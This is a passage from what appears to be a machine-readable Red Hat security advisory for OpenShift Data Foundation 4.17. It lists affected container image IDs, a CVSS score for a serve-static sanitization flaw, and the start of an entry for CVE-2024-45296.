"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
